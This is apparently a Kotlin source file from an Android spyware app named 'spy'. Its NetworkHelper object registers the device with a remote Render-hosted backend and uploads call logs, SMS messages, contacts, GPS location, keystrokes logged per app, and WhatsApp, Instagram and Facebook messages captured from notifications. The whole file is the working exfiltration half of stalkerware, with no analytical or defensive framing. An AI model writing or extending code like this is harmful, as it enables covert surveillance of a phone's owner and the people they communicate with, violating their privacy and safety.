package com.gauravhanna.spy

import android.content.Context
import android.content.SharedPreferences
import android.util.Log
import com.google.gson.Gson
import okhttp3.*
import java.io.IOException
import java.util.concurrent.TimeUnit

object NetworkHelper {
    private const val TAG = "NetworkHelper"
    // ⚠️ Change this to your actual Render backend URL
    private const val BASE_URL = "https://gauravhanna-spy.onrender.com/api/client"
    private val client = OkHttpClient.Builder()
        .connectTimeout(30, TimeUnit.SECONDS)
        .writeTimeout(30, TimeUnit.SECONDS)
        .readTimeout(30, TimeUnit.SECONDS)
        .build()
    private val gson = Gson()

    // Store/retrieve device ID (generated by server after registration)
    private fun getDeviceId(context: Context): String? {
        val prefs = context.getSharedPreferences("spy_prefs", Context.MODE_PRIVATE)
        return prefs.getString("device_id", null)
    }

    private fun setDeviceId(context: Context, id: String) {
        val prefs = context.getSharedPreferences("spy_prefs", Context.MODE_PRIVATE)
        prefs.edit().putString("device_id", id).apply()
    }

    /**
     * Register this device with the backend.
     * Should be called once when the app first runs.
     */
    fun registerDevice(
        context: Context,
        deviceId: String,
        deviceName: String,
        model: String,
        androidVersion: String,
        userId: String
    ) {
        val json = """
            {
                "deviceId": "$deviceId",
                "deviceName": "$deviceName",
                "deviceModel": "$model",
                "androidVersion": "$androidVersion",
                "userId": "$userId"
            }
        """.trimIndent()
        val body = RequestBody.create(MediaType.parse("application/json"), json)
        val request = Request.Builder()
            .url("$BASE_URL/register")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Device registration failed: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.use {
                    if (it.isSuccessful) {
                        val bodyStr = it.body?.string() ?: ""
                        Log.d(TAG, "Device registered: $bodyStr")
                        // Optionally parse server device ID and store it
                        // but we already use the same deviceId string, so just store it
                        setDeviceId(context, deviceId)
                    } else {
                        Log.e(TAG, "Device registration HTTP error: ${it.code}")
                    }
                }
            }
        })
    }

    /**
     * Send call logs to the server.
     */
    fun sendCalls(context: Context, calls: List<DataCollector.CallLogEntry>) {
        val deviceId = getDeviceId(context)
        if (deviceId == null) {
            Log.e(TAG, "Device not registered – cannot send calls")
            return
        }
        val json = gson.toJson(calls)
        val body = RequestBody.create(
            MediaType.parse("application/json"),
            "{\"deviceId\":\"$deviceId\",\"calls\":$json}"
        )
        val request = Request.Builder()
            .url("$BASE_URL/calls")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Failed to send calls: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.close()
                Log.d(TAG, "Calls sent successfully")
            }
        })
    }

    /**
     * Send SMS messages to the server.
     */
    fun sendSMS(context: Context, smsList: List<DataCollector.SmsEntry>) {
        val deviceId = getDeviceId(context) ?: return
        val json = gson.toJson(smsList)
        val body = RequestBody.create(
            MediaType.parse("application/json"),
            "{\"deviceId\":\"$deviceId\",\"messages\":$json}"
        )
        val request = Request.Builder()
            .url("$BASE_URL/messages")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Failed to send SMS: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.close()
                Log.d(TAG, "SMS sent successfully")
            }
        })
    }

    /**
     * Send contacts to the server.
     */
    fun sendContacts(context: Context, contacts: List<DataCollector.ContactEntry>) {
        val deviceId = getDeviceId(context) ?: return
        val json = gson.toJson(contacts)
        val body = RequestBody.create(
            MediaType.parse("application/json"),
            "{\"deviceId\":\"$deviceId\",\"contacts\":$json}"
        )
        val request = Request.Builder()
            .url("$BASE_URL/contacts")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Failed to send contacts: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.close()
                Log.d(TAG, "Contacts sent successfully")
            }
        })
    }

    /**
     * Send a GPS location to the server.
     */
    fun sendLocation(context: Context, lat: Double, lng: Double, address: String?, speed: Float) {
        val deviceId = getDeviceId(context) ?: return
        val json = """
            {
                "deviceId": "$deviceId",
                "lat": $lat,
                "lng": $lng,
                "address": ${if (address != null) "\"$address\"" else null},
                "speed": $speed
            }
        """.trimIndent()
        val body = RequestBody.create(MediaType.parse("application/json"), json)
        val request = Request.Builder()
            .url("$BASE_URL/location")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Failed to send location: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.close()
                Log.d(TAG, "Location sent successfully")
            }
        })
    }

    /**
     * Send a keylog entry to the server.
     */
    fun sendKeylog(context: Context, appPackage: String, text: String) {
        val deviceId = getDeviceId(context) ?: return
        val escapedText = text.replace("\"", "\\\"")
        val json = """
            {
                "deviceId": "$deviceId",
                "appPackage": "$appPackage",
                "text": "$escapedText"
            }
        """.trimIndent()
        val body = RequestBody.create(MediaType.parse("application/json"), json)
        val request = Request.Builder()
            .url("$BASE_URL/keylog")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Failed to send keylog: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.close()
                Log.d(TAG, "Keylog sent successfully")
            }
        })
    }

    /**
     * Send a social media message (WhatsApp, Instagram, Facebook) captured via notification.
     */
    fun sendSocialMessage(
        context: Context,
        app: String,          // "whatsapp", "instagram", "facebook"
        contactName: String,
        message: String,
        timestamp: Long
    ) {
        val deviceId = getDeviceId(context) ?: return
        val escapedMessage = message.replace("\"", "\\\"")
        val json = """
            {
                "deviceId": "$deviceId",
                "app": "$app",
                "contactName": "$contactName",
                "message": "$escapedMessage",
                "timestamp": $timestamp,
                "isIncoming": true
            }
        """.trimIndent()
        val body = RequestBody.create(MediaType.parse("application/json"), json)
        val request = Request.Builder()
            .url("$BASE_URL/messages")
            .post(body)
            .build()
        client.newCall(request).enqueue(object : Callback {
            override fun onFailure(call: Call, e: IOException) {
                Log.e(TAG, "Failed to send social message: ${e.message}")
            }

            override fun onResponse(call: Call, response: Response) {
                response.close()
                Log.d(TAG, "Social message sent successfully")
            }
        })
    }
}